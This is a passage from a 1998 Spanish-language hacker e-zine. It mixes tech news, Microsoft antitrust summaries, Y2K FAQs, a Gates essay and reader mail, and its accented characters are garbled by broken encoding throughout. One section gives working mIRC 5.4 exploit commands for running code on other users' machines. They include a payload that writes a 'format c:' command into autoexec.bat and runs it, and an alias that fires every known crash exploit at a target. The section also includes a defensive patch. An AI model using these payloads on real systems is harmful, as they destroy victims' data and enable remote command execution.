de Live Picture, quien agreg� que "con la tecnolog�a actual no resulta
pr�ctico imprimir un folleto, poster o informe y reci�n despu�s
distribuirlo, e incluso tampoco es �til hacerlo a trav�s de modems
standards porque se pierde mucho tiempo".

LLEGA UNA NUEVA CAMADA DE NOTEBOOKS
Otra ola de delgadas y modernas notebooks se espera que sean lanzadas al
mercado para fines de esta semana cuando haga su aparici�n el esperado
Pentium II 300-MHz de Intel para computadoras port�tiles. Las ventas de las
notebooks bajaron en los �ltimos meses, especialmente en comparaci�n con la
salida que tuvieron los desktops, y mucho tuvo que ver en esto el precio de
las port�tiles. Empezando por m�quinas que se comercializaban a 3200
d�lares, la diferencia de precio entre las notebooks PCs de �ltima
generaci�n y los desktops era realmente importante, incluso la m�s grande
jam�s registrada. A pesar de que las port�tiles con procesadores de 233 y
266 MHz bajar�n de precio con la llegada del nuevo chip, buena parte de las
notebooks se seguir�n vendiendo por sobre los 2000 d�lares en el mercado
estadounidense. Y todas las miradas estar�n puestas en ma�ana, 9 de
septiembre, fecha de aparici�n de las nuevas m�quinas con los procesadores
Pentium II de 300-MHz. Compaq lanzar� la Armada 3500 y la 6500 e incluir�
el flamante chip en otros de sus productos, Gateway har� lo propio en su
l�nea de notebooks y Dell estrenar� la Inspiron 7000. Otras de las empresas
que incorporar�n el nuevo procesador de Intel son Toshiba, Hewlett-Packard
y NEC.

MOTOROLA PRESENTO SU SET-TOP COMPUTER
En momentos es que comienzan a surgir diferentes modelos de set-top TV que
permiten disfrutar de distintos contenidos audiovisuales, Motorola lanz� su
modelo de set-top computer para las compa��as de cable que proveer�n una
amplia variedad de contenidos multimedia incluyendo acceso a Internet y
reproducci�n de DVDs. De acuerdo a Motorola, su Blackbird se diferencia
ampliamente del WebTV de Microsoft y proveer� una plataforma que en un
mismo dispositivo permitir� disfrutar de productos y servicios con la m�s
avanzada tecnolog�a 3D, juegos y pel�culas en DVD y la posibilidad de
navegar en Internet. Jim Reinhart, ejecutivo de Motorola, manifest� que se
logr� desarrollar este producto gracias a la utilizaci�n en conjunto de
procesadores PowerPC y avanzada tecnolog�a multimedia de VM Labs. Reinhart
agreg� que Blackbird permite "ver una pel�cula de un canal de cable,
emitida v�a sat�lite o de un DVD, mientras que la misma tecnolog�a se
utiliza para que el consumidor pueda disfrutar los m�s recientes y mejores
juegos de consolas". Si bien saben que llevar� un tiempo para que el nuevo
producto sea masivo, en Motorola afirmaron que ya tienen pedidos por un
mill�n de unidades y estiman que la demanda aumentar� con el correr de los
meses.
http://www.news.com/News/Item/0,4,26321,00.html?st.ne.2.gif.1
http://headline.gamespot.com/news/98_09/14_projectx/index.htm

INTEL BAJO LOS PRECIOS DE SUS CHIPS HASTA UN 34%
El fabricante de procesadores m�s importante del mundo inform� que redujo
los precios de sus chips hasta un 34%, con lo que busca incrementar la
demanda mientras toma ventaja de la ca�da de los costos de fabricaci�n.
Mientras Intel aumenta la producci�n de nuevos chips y traslada a los
usuarios el ahorro de costos en el proceso de fabricaci�n, tambi�n reduce
los precios de los procesadores m�s viejos para poder posicionar los
nuevos. Intel, que sol�a bajar los precios una vez por trimestre,
�ltimamente comenz� a hacerlo todos los meses. En �sta reciente medida
redujo el precio de su chip m�s veloz, el Pentium II 400-MHz, en un 18%, y
tambi�n hizo lo propio con el Pentium II 350-MHz (29%), y con el 266-MHz
Pentium dise�ado para laptops (34%).
http://www.techweb.com/wire/story/reuters/REU19980914S0003

SEGUIMIENTO EXAUSTIVO A MOCO$OFT (primer quincena del mes)
================================

MICROSOFT RECHAZO LAS ACUSACIONES DE SUN CON RESPECTO A JAVA (31 de agosto de 1998)
A trav�s de un documento presentado ante la corte que interviene en el caso
el viernes 28 de agosto pasado, Microsoft rechaz� en�rgicamente las intimaci�n
preliminar presentada por Sun Microsystems en su contra alegando que una
acci�n de ese tipo "causar�a no s�lo un gran da�o a Microsoft sino tambi�n
a sus distribuidores, revendedores, desarrolladores de software e incluso a
los propios usuarios". En el mes de mayo, Sun present� una intimaci�n
preliminar argumentando que el Windows 98 incluye una versi�n de Java que
es incompatible con la desarrollada por ellos, por lo que solicita que se
obligue a Microsoft a incluir la versi�n de Sun en el flamante sistema
operativo y que se le impida a la compa��a de Bill Gates distribuir el
Visual 6.0 hasta tanto no sea totalmente compatible con la versi�n standard
del Java de Sun. En su descargo realizado el viernes, Microsoft manifest�
que no s�lo la empresa cumpli� con la licencia sobre Java que mantiene con
Sun, sino que todos sus productos son compatibles con el sistema en
cuesti�n.

AMPLIARIAN EL CASO JUDICIAL DE MICROSOFT (1 de setiembre de 1998)
El Departamento de Justicia de los Estados Unidos y los 20 estados
norteamericanos que est�n demandando a Microsoft planean aumentar la
presi�n sobre la empresa de Bill Gates al incluir alegatos sobre nuevas
presuntas pr�cticas monop�licas y da�inas por parte del gigante del
software. Las nuevas acusaciones podr�an ser presentadas hoy mismo e
incluir�an evidencia que demostrar�a que Microsoft presion� a Intel para
que no tuviera en cuenta el software de su competidor Netscape
Communications, que manipul� su sistema operativo Windows para que no pueda
trabajar con productos de otras firmas, y que intent� dividirse el mercado
del software de audio y video con Apple Computer, de acuerdo a lo publicado
por el Seattle Times. Seg�n estipula la ley norteamericana, el gobierno y
los estados s�lo pueden incluir nueva evidencia en caso de que la misma
est� relacionada con los cargos antes presentados. El juez que entiende en
la causa, ahora deber� determinar si la nueva evidencia puede ser tenida en
cuenta para el juicio que comenzar� el pr�ximo 23 de septiembre.

MICROSOFT VENCIO A LA PRENSA (3 de setiembre de 1998)
El gigante del software argument� ayer que las declaraciones que realizar�n
Bill Gates y otros ejecutivos de la compa��a en el caso que se le sigue a
Microsoft por presuntas actividades monop�licas tendr�an que permanecer en
secreto por lo que la prensa y el p�blico no deber�an tener acceso a las
mismas. En una extensa presentaci�n elevada a la corte federal de
apelaciones norteamericana, Microsoft reclam� que el art�culo de una ley de
1913 que hace referencia a los testimonios en casos similares al que
enfrenta por estos d�as la empresa de Bill Gates no puede ser tenido en
cuentas ya que los juicios sobre actividades monop�licas cambiaron mucho
con respecto a los de principios de siglo. Los oficiales del Departamento
de Justicia de los Estados Unidos estuvieron de acuerdo con la petici�n de
Microsoft. Por lo tanto, la orden que hab�a dado el juez Thomas Penfield de
permitir el acceso de la prensa y el p�blico tras la petici�n que hab�an
hecho empresas como Reuters y The New York Times no ser� tenida en cuenta y
tanto Gates como el resto de los ejecutivos testificar�n en privado.

MICROSOFT DENUNCIA UNA EMBOSCADA (4 de setiembre de 1998)
La compa��a de Bill Gates le dijo ayer a un juez federal que los fiscales
que la acusan de actividades antimonop�licas pretenden tenderle una
emboscada con la nueva evidencia que quieren presentar, y solicit� que la
misma no sea tenida en cuenta o que, de lo contrario, el juicio se demore
seis meses. En respuesta al nuevo material que el Departamento de Justicia
norteamericano y los 20 estados demandantes presentaron en los �ltimos
d�as, Microsoft asegur� que esa acci�n atenta contra la posibilidad del
gigante del software de preparase de la mejor manera posible para el
juicio. Los abogados de Microsoft manifestaron que "si la Corte accede al
pedido de los demandantes el juicio debe posponerse al menos seis meses
para poder tener la chance de recoger evidencia, y al mismo tiempo no debe
imponerse un l�mite en la cantidad de testigos que puedan ser convocados
por cualquiera de las dos partes".

OBLIGAN A MICROSOFT A PRESENTAR EVIDENCIA (7 de setiembre de 1998)
El juez federal Thomas Penfield Jackson orden� a Microsoft entregar
evidencia relacionada a convenios comerciales que firm� con dos de sus
compa��as socias. A trav�s de un informe presentado el viernes, fiscales
del Departamento de Justicia de los Estados Unidos afirmaron que Microsoft
se hab�a negado a su petici�n de presentar informaci�n relacionada a
acuerdos que la empresa de Bill Gates firm� con Intel y Apple Computers,
como as� tambi�n contenidos de bases de datos vinculados a vendedores de
sistemas de computaci�n que adquirieron el OS del gigante del software. A
ra�z de �sta presentaci�n se le orden� a Microsoft que entregue el material
solicitado en forma inmediata. M�s all� de esta medida, el juez a�n no se
pronunci� con respecto a lo solicitado por los abogados de Microsoft que
hab�an pedido que esa evidencia no se incluyera en el juicio o que, de lo
contrario, se pospusiera el mismo al menos seis meses. El magistrado
inform� que esa determinaci�n, que puede ser vital para el desarrollo del
juicio, la anunciar� el 17 de septiembre.

IMPORTANTE EMPRESA CHINA UNE SUS FUERZAS CON MICROSOFT (9 de setiembre de 1998)
El gigante de la computaci�n de China, Legend Holdings, trabajar� con
Microsoft para introducir en el pa�s nuevas computadoras port�tiles del
tipo palm, las cuales incluir�n una versi�n china del sistema operativo
Windows CE de Microsoft. Las flamantes computadoras, cuyo tama�o ser�
apenas un poco m�s grande que el de un cassette de audio, llegar�n al
mercado en diciembre y se comercializar�n, seg�n el ejecutivo de Legend
Chen Jing, a 420 d�lares. Microsoft ya se hab�a unido con fabricantes de
productos electr�nicos como Casio y Philips Electronics para producir
dispositivos port�tiles que trabajaran con su Windows CE, pero para su
debut en el mercado chino prefiri� asociarse con una empresa local. De esta
manera, la compa��a de Bill Gates intenta sacar ventaja sobre su competidor
3Com, productora de las famosas PalmPilots, para transformarse en la
primera empresa en lanzar dispositivos manuales en China. 3Com anunci� que
dar� a conocer versiones locales de sus PalmPilots en toda Asia para fines
de este a�o.

LAS VENTAS DEL WINDOWS 98 SUPERARON LAS EXPECTATIVAS (10 de setiembre de 1998)
El n�mero uno de Microsoft, Bill Gates, afirm� ayer que las ventas de su
flamante Windows 98 son mayores a las que se registraron tras la aparici�n
de su predecesor, el Windows 95, e incluso que las expectativas se
superaron ampliamente. En el marco de un encuentro sobre informaci�n
tecnol�gica realizado en Portugal, Gates manifest� que "si bien antes de su
lanzamiento no se cre�a que el Windows 98 pudiera superar las ventas del
Win 95, los n�meros ahora demuestran que el nuevo sistema operativo tuvo
mayor aceptaci�n que el anterior". Mientras coment� que Microsoft "es muy
buena desarrollando softwares masivos" y que el objetivo inmediato de la
compa��a es hacer que sus productos sean cada vez m�s f�ciles de utilizar,
Gates admiti� que "Windows, Office y Backoffice representan cerca del 90%
de las ventas del grupo Microsoft".

NOVELL INCLUIRA EL EXPLORER DE MICROSOFT EN SUS PRODUCTOS (11 de setiembre de 1998)
En un sorpresivo movimiento que marca de alguna manera el buen momento por
el que est� atravesando el Internet Explorer en cuanto a aceptaci�n, Novell
anunci� que ofrecer� el navegador de Microsoft en sus productos, incluido
el OS para servers NetWare 5. Rivales extremos en los mercados de sistemas
operativos y aplicaciones para desktops, Novell y la empresa de Bill Gates
har�n coincidir por primera vez sus softwares en un mismo producto. El
Communicator de Netscape tambi�n ser� ofrecido con el NetWare, y as� ambos
browsers interactuar�n con el servidor de webs FastTrack que estar�
incluido en el NetWare 5. Para explicar este sorpresivo convenio entre dos
empresas hist�ricamente rivales, Christopher Stone, vicepresidente de
Novell, manifest� que "en momentos en que el 90% del mercado de los
browsers est� acaparado por Microsoft y Netscape, Novell consider� que lo
m�s sensato era brindarle a sus clientes diferentes opciones para navegar
la web".

Preguntas mas frecuentes sobre los BUGS de Moco$oft
===================================================

�Es compatible Windows 3.1 con el a�o 2.000?

Seg�n inform� la empresa Microsoft, tanto el Windows 3.1 como el Windows 95
presentar�n algunos errores est�ticos en su versi�n original cuando llegue el
cambio de milenio. Esto se deber� a que el desplegado de archivos creados en
el 2.000 genera basura en la pantalla. No obstante, aseguran, este inconveniente
no originar� ning�n error de c�lculo ni destruir� informaci�n.

�Presentar� problemas con el tema del a�o 2000 la planilla de declaraci�n jurada de
IVA de la DGI?

Seg�n inform� la Administraci�n Federal de Ingresos P�blicos (AFIP), todos los programas
de los sistemas inform�ticos que el organismo utiliza para controlar la recaudaci�n de
impuestos ser�n totalmente compatibles con el 2000. Los expertos est�n trabajando en su
reconvesi�n. Aunque la mayor parte del trabajo est� lista, todav�a faltan una serie de
ajustes. Pero en la AFIP conf�an en que llegar�n a tiempo.

�El problema del 2000 afectar� s�lo a las computadoras?

No. Tambi�n podr�an afectar a los sistemas industriales, cajas de seguridad de bancos,
juegos de parques de diversiones o ascensores autom�ticos. Por esto suele decirse que el
problema se trata m�s de un problema electr�nico que inform�tico. El problema del 2000
surgi� cuando, en la d�cada del sesenta, se programaron los sistemas para que reconzcan el
cambio de a�o con dos d�gitos en lugar cuatro. La idea era ahorrar espacio en la memoria,
tiempo y dinero. Pero al llegar el 2000, muchos microprocesadores no podr�n reconocer las dos
primeras cifras.

�Hay lugares en Internet con informaci�n acerca del problema del a�o 2000?

S�. La Web cuenta con much�simos sitios desde donde se puede consultar informaci�n sobre el
fen�meno y m�todos para chequear si la computadora propia est� o no preparada para reconocer
el cambio de milenio.

�Qu� es el sistema Fat 32?

Es un sistema de almacenamiento por el cual la computadora almacena la informaci�n en bloques.
Estos bloques, llamados clusters, tienen una cantidad fija de datos, Kilobytes (KB).
Por ejemplo, en los discos cuyo tama�o var�a entre 540 KB y 1 GB, los clusters tienen un tama�o
de 16 K. Son los que trabajan con el sistema de almacenamiento Fat 16. En cambio, los que var�an
entre 1 y 2.1 GB, tienen 32 KB. Con el Fat 32, en cambio, el sistema que viene con el
Windows 98, cada uno de estos bloques preasignados se achican. En efecto, cada cluster pasa a
tener un espacio de 4 KB, de manera que permiten almacenar mayor cantidad de informaci�n o bien
optimizar el espacio en el disco r�gido para darle un respiro a la computadora sin tener que
salir a comprar uno nuevo.

�Se puede pasar al castellano a trav�s de Windows Update?

La �nica forma es reinstalar una versi�n de un idioma diferente, ya que no alcanza con cambiar
solo un archivo. La instalacion de Windows con distinto idioma convendr�a hacerse en un
directorio diferente para evitar conflictos, aunque habr�a que reinstalar todas las aplicaciones
que funcionan bajo Windows.

Internet da ganancias
=====================

Internet est� destinada a ser la forma dominante de informaci�n period�stica, pero hasta que
alcance ese status en algunos a�os, ser� dif�cil para los medios de prensa obtener ganancias.
La audiencia es todav�a demasiado peque�a como para interesar a los anunciantes.
"Gran parte del dinero que se obtendr� en Internet ser� el resultado del contenido de la
informaci�n, tal como ocurri� con la radio y la televisi�n -dije en 1996-. La revoluci�n de la
televisi�n que comenz� hace medio siglo, cre� una serie de industrias, incluida la fabricaci�n
de aparatos de televisi�n. Sin embargo, los ganadores a largo plazo fueron aquellos que emplearon
el medio para brindar informaci�n y entretenimiento.".
Eso no ha ocurrido todav�a (tambi�n advert� -afortunadamente-que eso demorar�a alg�n tiempo en
concretarse).
Dos a�os m�s tarde, tengo una mejor perspectiva de cu�nto demorar�n las compa��as en obtener
�xito financiero con sus publicaciones interactivas. Ahora advierto que incluso, cuando es
posible obtener ganancias, resulta todav�a dif�cil determinar si muchos sitios en Internet
podr�n conseguir grandes beneficios vendiendo informaci�n o anuncios que acompa�en a la
informaci�n gratuita.
En los Estados Unidos, las cadenas de cable CNN y MSNBC y el peri�dico USA Today tienen sitios
de gran volumen en Internet, pero todav�a no logran grandes ganancias. Eventualmente, conseguir�n
beneficios pues cuando el agua sube de nivel hace flotar algunas embarcaciones.
Pero la publicidad en Internet probablemente deber� aumentar al menos cuatro veces antes de que
aun los sitios m�s congestionados consigan ganancias de los anuncios. Y eso puede resultar a�n
m�s dif�cil para sitios con audiencias modestas. Tal vez algunos tengan gran �xito, pero no en
el futuro inmediato.
Pero hay otras razones para trabajar en sitios de la Internet, adem�s de los beneficios
inmediatos. Algunas empresas est�n utilizando la red electr�nica para promover productos.
Algunos sitios ya est�n teniendo �xito en materia financiera. Se trata de lugares que efect�an
transacciones y usan el poder de la Internet para eliminar intermediarios y reducir costos.
Por ejemplo, Expedia, uno de los sitios de mi empresa Microsoft, vende gran cantidad de pasajes
a�reos y alquila habitaciones de hoteles.
Algunos sitios han conseguido ganancias, al menos entre los inversores, mediante la distribuci�n
de informaci�n o guiando a los usuarios hacia ciertos lugares de la Web.
La venta de ideas nunca ha sido un negocio que redit�e grandes beneficios, excepto para algunas
empresas e individuos. Por ejemplo, no se obtiene mucho dinero escribiendo libros. Por supuesto,
algunos autores ganan mucho dinero, pero eso no ocurre con la gran mayor�a de ellos.
Algunas compa��as que venden informaci�n o ideas en Internet obtendr�n ganancias,
pero la mayor�a no.
Un �rea relativamente exitosa ha sido la venta de informaci�n relacionada con la industria de
las computadoras. Internet es obviamente el mejor medio para llegar a usuarios interesados en
computadoras. Por lo que los anunciantes est�n dispuestos a respaldar algunos de esos sitios.
Pero las publicaciones impresas tienen un problema. A medida que los diarios y revistas de la
Internet mejoren, las suscripciones y avisos comenzar�n a reducirse en dichas publicaciones.
Las empresas period�sticas que tratan una edici�n electr�nica como algo marginal quedar�n
desencantadas una vez que los anunciantes comiencen a cambiar el destino de sus avisos, y
pongan su dinero en los medios electr�nicos de comunicaci�n.
En cuanto a las empresas de informaci�n m�s grandes y mejores de la Internet, la situaci�n
mejorar� much�simo una vez que se convierta en la principal v�a informativa. Algo que ayudar�
ser� la televisi�n digital. La gente comenzar� a enfilar hacia sitios de la Internet una vez que
pueda establecer comunicaci�n a trav�s de sus aparatos de televisi�n. Algunos sitios podr�an
capturar parte de las ganancias que ahora enfilan hacia las redes de televisi�n.
Ponerse en contacto con un servicio de Internet o llamar p�ginas electr�nicas a la pantalla ser�
una tarea innecesaria una vez que las conexiones con Internet funcionen 24 horas al d�a.
Explorar Internet ser� realmente fascinante cuando cualquier usuario pueda llevar consigo una
computadora peque�a y barata capaz de conectarse sin necesidad de cables.
En ese momento, Internet superar� a cualquier otro medio de informaci�n.

BILL GATES (Primer Hacker ? :-))
Fundador y presidente de Mico$oft.

Bueno aki le ponemos un nuevo Bug para clientes IRC .. muy gueno ,, para ejecutar comandos
a distancias ... SMS ,, Backorifice , netspy jajaj ...
Funciona de la siguiente manera ..

Para clientes bajo Guindoze!!

/ctcpreply (nickname) ping $quit(i,am,owned)
Result:
*** ^DaWg^ (
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
) Quit (owned by nofear)

Para clientes Unix ..a travez de telnet al server por los puertos de siempre
6666 o 6667 etc...
Ya una vez conectado y teniendo nick .. hacemos lo siguiente ..

notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)
and bam!@#

Algunas otras cositas ue se pueden hacer ... serian

/ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
/ctcpreturn (nick) $run(c:\autoexec.bat)

Ahora hecha a correr tu imaginacion .... ... ahhh los parches ...

el primero seria muy simple .. en tu cliente IRC ...typeas /events off
o ponle el siguiente parche ... guardalo como m54-fix-sploits.mrc y para
salvarlos solo pones lo siguiente en tu cliente .."/load -rs m54-fix-sploits.mrc"

Bueno aki va el parche !!!

;mIRC 5.4 QuickFIX and Exploits
;myn@efnet - 07/22/98

;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)

;DCC exploit fix
ctcp *:DCC SEND: { if == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : - | halt } }
ctcp *:DCC RESUME: { if == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : - | halt } }

;ctcpreply ping $asctime crash and $identifier Exploit fix
;replace all instances of the event "on ctcpreply" with the one below

on 1:CTCPREPLY:PING* {
if (2147483647 isin [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r3.txt]) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
if ($ isin [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r3.txt]-) { echo -a * Incoming ctcpreply identifier exploit --> [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r3.txt]- from $nick | halt }
echo -a * [ $+ $nick PING reply]: $calc($ctime - [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r3.txt]-) sec(s)
halt
}

;And as an added bonus for all you DALnet kiddies
;This sends all known mIRC 5.4 exploits at once
alias m54kill {
if (jumi) {
.ctcpreply jumi ping $!quit(I'm, a, DALnet, KiDDie)
%ip = $rand(600000000,4294967294)
.quote privmsg jumi : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg jumi : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
.ctcpreply jumi ping $!asctime(2147483647)
echo -a * Sent mIRC kills to jumi
halt
}
echo -a * Parms [/m54kill nick/#channel]
}

NOTICIA DE ULTIMA HORA !!!!!

Saqueadores ... a desaparecido de geocities .. las razones serian las siguientes ...

En el �ltimo n�mero del e-zine SET (el 16) se public� un trozo de
log sacado del canal #hack del IRC hispano, en el que se mostraba
la gran sabidur�a de toda esta gente que frecuenta ese canal:
despu�s de muchos a�os de estudio han aprendido a escribir la
palabra 'elite' con n�meros y tambi�n a dar y, sobre todo,
denegar OP's.

Pues esta gente tan lista y con esa gran sabidur�a han enviado un
mail a geocities avis�ndoles de que hay una p�gina sobre hacking
en su server y quej�ndose para que la quitaran. Y as� lo hicieron.

Por su culpa, SET est� buscando otra web. Parece mentira que esa
gente, que ha aprendido lo que saben gracias a e-zines como SET o
RareGaZz sean capaces de hacer eso. HAN CAIDO MUY BAJO!!!!.

No quiero con esto decir que toda la gente de ese canal sea as� de
est�pida. Afortunadamente, s�lo son unos cuantos. Yo conozco a
alguna gente de all� y os puedo asegurar que son buena gente, pero
hay otros que piensan que ser hacker es conseguir OP en los
canales de IRC y luego banear a todo aquel que pueden para
demostrar as� su hombr�a.

Lamentamos profundamente esta situacion que le han generado al mas veterano de los E-Zine de lengua
Hispana ... la verdad nos sentimos indignados de como personajes tan imbeciles no sean capaces de
manifestarse de otra forma que no sea la cobardia .... Se�ores de SET cuenten con NUESTRO APOYO
INCONDICIONAL PARA LO QUE SEA ,,,,

~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 11.-AH llegado MAIL!!! #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~
_______________________________________________________________ By VaRioS

Bueno estamos estrenando esta seccion ... la verdad queremos que sirva para
hacer contactos o nos envien comentarios .... si nos empiezan a preguntar como
hacer esto y hacer esto otro no se si seamos capaces de responder vustras respuestas
ya que como he repetido varias veces todavia estamos en etapa de organizacion ..
ya que no somos ni grupo ni asocioacion .. hacker ... ni siquiera somo hackers....
solo hacemos un E-Zine que esperamos les sirva a todos ,,,,

_____________________________________________ Marco Antonio ..:mansor_00@xxxxxxx

Saludos
Me algre, al saber de un tal proyecto r chileno
buena onda, al kacharlos en la 16 del set, me animo a ir a ver ke tal.

como primer comentario:

jejej realmente es gracioso tener mas o menos los profesores , jejej
onda la isla , raregazz, set, y las otras ...jejeje parece ke se
leyeron todas las ke salen en la linkera de iberhack o en la de
cyberhack ....
pero todas estas revistas habran llegado hacer tan geniales como lo
fue la gloriosa VZM liderada por mi amigo legion?

tambien, me di cuenta ke estan bien informados onda la brujala,
jejej y las demas, no me extra�aria ke mencionaran un comentario de
los de la kriptopolis en alguna edicion
bueno....

---------------------------- PlaXiuS --------------------------------------
<:: Gracias y no te olvides de la Kriptonomicon , y varias listas de correo
como la de Raredudez que es Genial !!!::>
---------------------------------------------------------------------------
segundo comentario:

si bien es cierto, que en la chile hay buenos hackers, los hackerz no
son privativo de los lokos de la U, tambien los hay en la UFRO,
(universidad de la frontera) quienes dise�aron un virus, mas o menos
bueno, con una bonita interfaz grafika y ke los antivirus
tradicionales no sakaba (por lo menos hasta el 96) seria bueno
tratar de ubikarlos y haber ke kuenten sus logros.
pero kreo ke los mas avanzados en chile en la tematika, y ke se
instruyeron directamente de los gringos (2600, preack, anarky y otros)
son los de la santa maria. sin lugar a dudas.
pero tampoko hay ke desmerecer a los kolegas de la kato ke si bien no
somos famosos, (eso ya es un gran logro hoy por hoy para un verdadero
jaker) hemos hechos mas de una ke otra kosita por ahi.

---------------------------- PlaXiuS -------------------------------------
<:: Solo era un comentario .. pero es verdad hay excelentes hackers en las
diversas universidades del pa�s , asi como tambien hay informaticos que no
tienen idea de nada !!! .. Han escuchado hablar del virus katiuska ... dicen
que es un HOAX .. de lo cual yo no estaria tan seguro , pero desgraciadamente
los chilenos somos bastantes desconocidos en el ambiente .... por que no
hay un circulo de comunicacion , Ahhh y como simpre lo he dicho no me considero
hacker ... creo que estoy a a�os luz para llegar a parecerme a uno .. lo unico que
deseo con este E-Zine es crear una conciencia informatica y que aprendamos a
utilizar todos nuestros recursos y que las empresas e instituciones tomen medidas
al respecto .... que no se confien mucho !!!::>
--------------------------------------------------------------------------

tercer comentario:

es super aplusible ke kieran darle duro con el linux.
ke sin duda no es kosa facil, y a manera de aporte les paso este link
(si es ke no lo tenian) donde salen las traducciones del how ...? y
muchas cosas mas como una intro a mi adorado debian.
jejej
http://www.cs.us.es/archive/linux.html

tambien les doy este otro link ke es un programa para controlar la
tarifa telefonika de conexion.
-�y cual es la gracia?
tiene dos gracias
-�cuales ?
una es en espa�ol
-�asi?..... �ya y....?
la otra es ke tiene las tarifas de ese olvidado lugar del mundo
llamado chile, osea tiene una version pensada para este extra�o
lugar, osea es una version de control de telefono pensada en la
telefonika chile....
-�y ke mas?
bueno eso es todo....
shi.... lo encontrai poko? dime dos programas decentes de uso util ke
esten pensado en este extra�o lugar y tengan onda telefonika....
si mas chamullo este es el enlace

http://www.interlan-stc.es/webs/leo/gtel/

---------------------------- PlaXiuS -------------------------------------
<:: Sobre el Linux le vamos a seguir dando duro ... que sepan que mocosoft
nos vende pura basura .. !!! gracias por el Link bueno por los dos !!! vamos
a hecharle una miradita al tarificador ....(milagro se acordaron que existiamos)Ahh
se me le orvidaba ,, en la ultima PCWorld Chile , viene un cd de LINUX GRATIS ,,,
creo que de la distribucion S.U.S.E.::>>
---------------------------------------------------------------------------

cuarto comentario:

�ustedes saben de alguna bbs ke trate la tematika esta decente y con
alturas?
y obviamente este en santiago
bueno aparte de las bbs ke duran 3 horas y son para el uso de los
kolegas...

---------------------------- PlaXiuS -------------------------------------
<:: Creo que ninguna .. pero han escuchado hablar de BBS Virgo .. pero es de
Valpo .??::>>
--------------------------------------------------------------------------

kinto comentario:

hace mas de un a�o (�?) un kolega me comento un encuentro furtivo con
un loko ke trabajaba en la bolsa de comercio (�!) ke hablaba de hack,
virus y cosas del tema, y ke tubo una discuzion con mi kolega, onda
por dos kosas, una por la defensa de los lamerz users op del #chile
(segun mi kolega) ke hacia este personaje, y otra por politika....
ademas me komento de una pagina muy pretenciosa pero en verdad
desastroza, ke en una de sus tenia algo asi de SIN CENSURA o
algo por el estilo donde se hacia una defensa de un tipejo llamado
pinocho, y se impelia a la gente al olvido.

<:: Para ser op no es necesario ser un superhacker o algo por el estilo ..
y eso no le daba derecho de formatearle el disco duro y a llenarles su correo con
un mailbombing ... ESAS ACTITUDES NO SON DIGNAS DE ALGUIEN QUE SE PUEDA AUTODOMINAR
HACKER .. Ademas a que le llama LAMERS ?? creo que no esta claro el concepto ...
Ahh sobre pinocho ,,, mi opinion era que los jovenes deberiamos preocuparnos por
nuestro bienestar y olvidar los rollos de los viejos que al final ellos se preocupan
solamente de ellos ... deberiamso preocuparnos por nuestro futuro .. las oportunidades
.. educacion .... hay mucho joven que no puede estudiar por que no tienen plata .. lo
que es peor ,,, es que muchos de estos jovenes tienen aptitudes y ganas de hacerlos ..
asi que para que seguir dandole vueltas al 73 .. dejemos eso a los viejos velemos por
nuestro futuro y el de las generaciones futuras !!!::>

�krees tu ke podras hacer una buena revista ke kuente kon el apoyo de
la eskasa escena nacional teniendo una postura politika tan marcada?
krees ke son pokos los del ambiente ke sue�an con ver a pinocho
devorado por los gusanos y a todos sus cerdos perdon amigos?
�kachaste bien lo ke paso el once?
� krees ke todos komparten ese premio es merecido para la gladis marin?
ahora si pensamos....
uno... se podria concluir ke la gente chilena es juiciosa y no
propensa al rencor y a la venganza
yo nunka konkluiria eso.
ahora una pregunta
�si sigues en esta linea cuanto tiempo krees ke dure en estallar la
guerra?
�krees ke solo los derechista jakean?
�habran jaker en movimentos de izkierda?
mmmmmm
si bien en chile no konosko ni se de nadie ke se pueda
hablar de grosso onda nivel del kevin, o del matt o de angelosso o
maki, se de algunos ke son tan peligrosos komo jugar a la ruleta rusa
con una 38.
y presisamente no le tienen mucho kari�o ke digamos a pinocho y a los
pinochetistas....
y no arrugan ....
asi ke de buena onda ....
si kieres hacer una revista con proyeccion, y ke tenga el respaldo de
la reducida escena lokal, limitate a no publikar tus pensamientos
politikos, porke para algunos estoy seguro ke tu gracioso huevo a la
marin, es una gran ofensa.
y te lo digo super en buena onda.
este loko ke diskutio kon mi kolega.... mmm segun mi kolega parece ke
era de maipu.

---------------------------- PlaXiuS -------------------------------------
<:: Bueno sobre el huevo de oro se lo daremos a quien lo merezca ,,, se de
izquierda o derecha .... si lees bien la pagina web .. le brindamos todo el apoyo
a las personas que fueron a la marcha .. para recordar pacificamente la
conmemoracion de sus muertos .. pero condenamos la actitud de grupos
violentistas que se aprovecharon de la situacion para hacer destrozos , saqueos ,
etc ... a caso no supieron que la misma gente que estaba en la marcha pacificamente
trato de detener a estos tipos , Tampoco somos facistas ni nada por el estilo solo
damos una opinion apolitica ... ni siquiera naci para el 73 .. y aunque mi padre era
del partido socialista y andubo arrancando de los milicos ... fue problema de el .. no tengo
por que arrastrar los problemas de mis antecesores en mis hombros .. creo que hay muchos
chilenos que estan aburridos de este rollo .. es cosa de ver las inscripciones electorales:)
...Si ese soy yo el de MAIPU ... upps que chico es el mundo ::>
---------------------------------------------------------------------------

�habra hackers en el cybercafe?

< :: no creo.. pero pensandolo bien .. sip puede ser ,,, conozco a un hacker teorico
bastante bueno !!!! .. ::>

sexto comentario
:
mmmm ya se me olvidaba....
en la 2600 esta la jakeada de la new york times o algo asi una
revista gringa....al fin y al kabo...

---------------------------- PlaXiuS -------------------------------------
<::Si nuestro amigo Mate se encargo ya del asunto ... creo que ya lo leiste ??::>
--------------------------------------------------------------------------

jejejje
kien te ense�o eso del down de apleet?
jejeje es super loko komo se experimenta alternativamente diferentes
personas ...jejejej
buena onda....
